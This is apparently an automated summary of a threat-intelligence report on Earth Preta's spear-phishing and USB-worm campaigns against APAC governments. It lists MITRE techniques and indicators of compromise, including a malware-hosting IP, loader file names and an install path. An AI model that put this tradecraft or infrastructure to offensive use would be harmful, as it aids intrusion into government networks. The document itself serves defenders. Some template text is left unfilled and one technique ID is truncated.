Earth Preta has upgraded its attack campaigns by introducing new malware variants and using HIUPAN-based propagation through removable drives to spread PUBLOAD. The group now conducts time-sensitive spear-phishing with multi-stage downloaders and focuses on APAC government targets, employing tools like FDMTP and PTSOCKET for control and exfiltration. #EarthPreta #PUBLOAD #HIUPAN #DOWNBAIT #PULLBAIT #CBROVER #PLUGX #FDMTP #PTSOCKET
Keypoints
- Earth Preta upgraded its attacks with new tools and malware variants.
- Propagation of PUBLOAD via a variant of the worm HIUPAN through removable drives.
- Use of additional tools like FDMTP and PTSOCKET for control and data exfiltration.
- Highly targeted and time-sensitive spear-phishing campaigns observed.
- Initial access facilitated by spear-phishing emails with multi-stage downloaders.
- Data collection and exfiltration performed using RAR and cURL.
- Focus on government entities in the APAC region, particularly in military and foreign affairs sectors.
MITRE Techniques
- [T1091] Replication Through Removable Media – Brief description of how it was used. ‘HIUPAN spreads through removable drives to deliver PUBLOAD’
- [T1566.001] Phishing: Spearphishing Attachment – Brief description of how it was used. ‘Spear-phishing emails with multi-stage downloaders’
- [T1547.00] Registry Run Keys / Startup Folder – Brief description of how it was used. ‘autorun registry entry and a scheduled task for persistence’
- [T1053.005] Scheduled Task – Brief description of how it was used. ‘scheduled task for persistence’
- [T1574.002] DLL Side-Loading – Brief description of how it was used. ‘loaded using DLL Side-Loading’
- [T1480.001] Environmental Keying – Brief description of how it was used. ‘Second stage PLUGX payload is protected with RC4 and DPAPI’
- [T1553.002] Code Signing – Brief description of how it was used. ‘DOWNBAIT is digitally signed’
- [T1055] Process Injection – Brief description of how it was used. ‘PLUGX will inject its codes into other processes’
- [T1082] System Information Discovery – Brief description of how it was used. ‘hostname and systeminfo are used to perform system information discovery’
- [T1518.001] Security Software Discovery – Brief description of how it was used. ‘WMIC is used to discover installed AV products’
- [T1049] System Network Connections Discovery – Brief description of how it was used. ‘Netstat is used to discover network connections’
- [T1016] System Network Configuration Discovery – Brief description of how it was used. ‘ipconfig and netsh are used to discover network configuration’
- [T1005] Data from Local System – Brief description of how it was used. ‘FILESAC is used to search for specific file types of interest’
- [T1560.001] Archive Collected Data: Archive via Utility – Brief description of how it was used. ‘Use of WinRAR or FILESAC to archive collected data’
- [T1567.002] Exfiltration to Cloud Storage – Brief description of how it was used. ‘Telemetry information suggests possible exfiltration to a cloud service’
- [T1048] Exfiltration Over Alternative Protocol – Brief description of how it was used. ‘Data are exfiltrated to attacker-controlled servers using cURL or PTSOCKET’
- [T1071.001] Web Protocols – Brief description of how it was used. ‘Downloaders and backdoors communicate with C&C using HTTP/HTTPS’
Indicators of Compromise
- [IP Address] WebDAV server – 16.162.188.93 – used to host DOWNBAIT, PULLBAIT, and CBROVER and decoy documents
- [File name] UsbConfig.exe – HIUPAN host for dll side-loading
- [File name] u2ec.dll – HIUPAN malware
- [File name] WCBrowserWatcher.exe – PUBLOAD host for dll side-loading
- [File name] cococcpdate.dll – PUBLOAD loader
- [File name] CocBox.zip – PUBLOAD encrypted component
- [File name] $.ini – HIUPAN configuration file
- [Path] C:ProgramDataIntel_ – HIUPAN install path
- [URL] http://myip.ipip.net – used in network reconnaissance commands (curl)
- [Tool] FDMTP – secondary control tool delivered by PUBLOAD
- [Tool] PTSOCKET – exfiltration tool used by PUBLOAD
- [Malware] DOWNBAIT – signed downloader used in spear-phishing chain
- [Malware] PULLBAIT – shellcode downloader used in the chain
- [Malware] CBROVER – backdoor spawned via DLL side-loading
Read more: https://www.trendmicro.com/en_us/research/24/i/earth-preta-new-malware-and-strategies.html